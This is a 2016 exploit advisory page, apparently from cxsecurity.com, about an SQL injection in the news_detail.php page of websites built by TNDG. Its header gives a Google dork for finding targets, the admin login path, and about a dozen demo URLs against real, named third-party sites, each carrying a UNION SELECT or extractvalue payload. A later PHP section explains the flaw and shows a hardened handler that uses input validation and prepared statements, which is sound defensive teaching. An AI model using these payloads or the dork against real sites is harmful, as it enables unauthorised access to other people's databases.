Design by TNDG SQL Injection

2016.02.04
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

######################
# Exploit Title : Design by TNDG SQL Injection
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://www.tndg.com.tw/
# Google Dork : intext:"Design by TNDG" news_detail.php
# Date: 04 Feb. 2016
# Tested On : Win 10 / Google Chrome / Mozilla Firefox
#
######################
# admin page: target/manager/login.php
#
# demos :
# http://www.thwca.org.tw/ch/news_detail.php?Sn=-79+union+select+1,2,version(),4,5,6,7--%20-
# http://www.uni-biotech.com/en/news_detail.php?Sn=-185+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15
# http://www.chaheng.com/english/news_detail.php?Sn=-41+union+select+1,2,3,4,version(),6,7,8,9,10
# http://www.jacn.com.tw/ch/news_detail.php?Sn=-73+union+select+1,2,3,4,version(),6,7,8,9,10,11,12
# http://www.chuandi.com.tw/ch/news_detail.php?Sn=-80+union+select+1,2,3,version(),5,6,7,8,9,10
# http://www.psjy.tw/ch/news_detail.php?Sn=-33+union+select+1,2,3,version(),5,6,7,8,9,10
# http://www.extremepower911.com/ch/news_detail.php?Sn=-7+union+select+1,2,3,version(),5,6,7,8,9,10
# http://www.nextapogee.com.tw/en/news_detail.php?Sn=-15+union+select+1,2,3,4,5,version(),7,8,9,10,11,12--%20-
# http://www.venture21.net/en/news_detail.php?c=News&i=34+and+extractvalue%28rand%28%29,concat%280x7e,version%28%29%29%29--
# http://www.kdmilk.com.tw/ch/news_detail.php?Sn=-20+union+select+1,2,3,version(),5,6,7,8,9,10
# http://www.motherwang.com/ch/news_detail.php?Page=1&Sn=-82+union+select+1,2,3,version(),5,6,7,8,9,10
# http://www.new-ocean.com.tw/ch/news_detail.php?Sn=-17+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15
######################
# discovered by : modiret
######################
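The demos above all follow one pattern: the numeric Sn (or i) parameter of news_detail.php is spliced straight into the SQL text, so a negative id followed by UNION SELECT replaces the result set with attacker-chosen columns (the varying column counts are just each site's table width). The PHP below is an added example written for this page, not code from TNDG or the advisory author: it shows that vulnerable pattern next to a hardened handler that validates Sn as a positive integer and binds it as a parameter. The table and column names (news, Sn, title, body), the function names and the in-memory SQLite database are assumptions made for the demonstration.

```php
<?php
// Added example (not TNDG code): the advisory's vulnerable pattern and its fix.
// Schema (news / Sn / title / body) and function names are assumed for illustration.

// --- Vulnerable pattern: the raw GET value becomes part of the SQL statement.
// A value like "-79 union select 1, sqlite_version(), 3" is then parsed as SQL,
// which is exactly what the advisory's version() demos rely on.
function news_detail_vulnerable(PDO $db, array $get): array
{
    $sn  = $get['Sn'] ?? '';
    $sql = "SELECT * FROM news WHERE Sn = " . $sn;   // attacker controls the query text
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// --- Hardened handler: reject anything that is not a positive integer, then
// bind the value so the database driver never treats it as SQL syntax.
function news_detail_safe(PDO $db, array $get): array
{
    $sn = filter_var(
        $get['Sn'] ?? null,
        FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]
    );
    if ($sn === false) {
        http_response_code(400);          // bad request, nothing reaches the database
        return [];
    }
    $stmt = $db->prepare('SELECT Sn, title, body FROM news WHERE Sn = :sn');
    $stmt->bindValue(':sn', $sn, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed sample data in an in-memory SQLite database so the script runs offline.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE news (Sn INTEGER PRIMARY KEY, title TEXT, body TEXT)');
$db->exec("INSERT INTO news VALUES (79, 'Welcome', 'first post')");

// Three-column UNION matches the three-column news table, as in the advisory's demos.
$injected = ['Sn' => '-79 union select 1, sqlite_version(), 3'];

echo "vulnerable handler with injected Sn:\n";
print_r(news_detail_vulnerable($db, $injected));   // the injected SELECT is executed

echo "hardened handler with injected Sn:\n";
print_r(news_detail_safe($db, $injected));         // validation fails, query never runs

echo "hardened handler with a legitimate Sn:\n";
print_r(news_detail_safe($db, ['Sn' => '79']));    // normal lookup still works
```

The integer check alone would already stop this advisory's payloads, but the prepared statement is the control that holds up when the parameter is later changed to a string (for example the `c=News` parameter on one of the demo sites), so keep both: validate the type at the edge and bind every value in the query.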



Copyright 2024, cxsecurity.com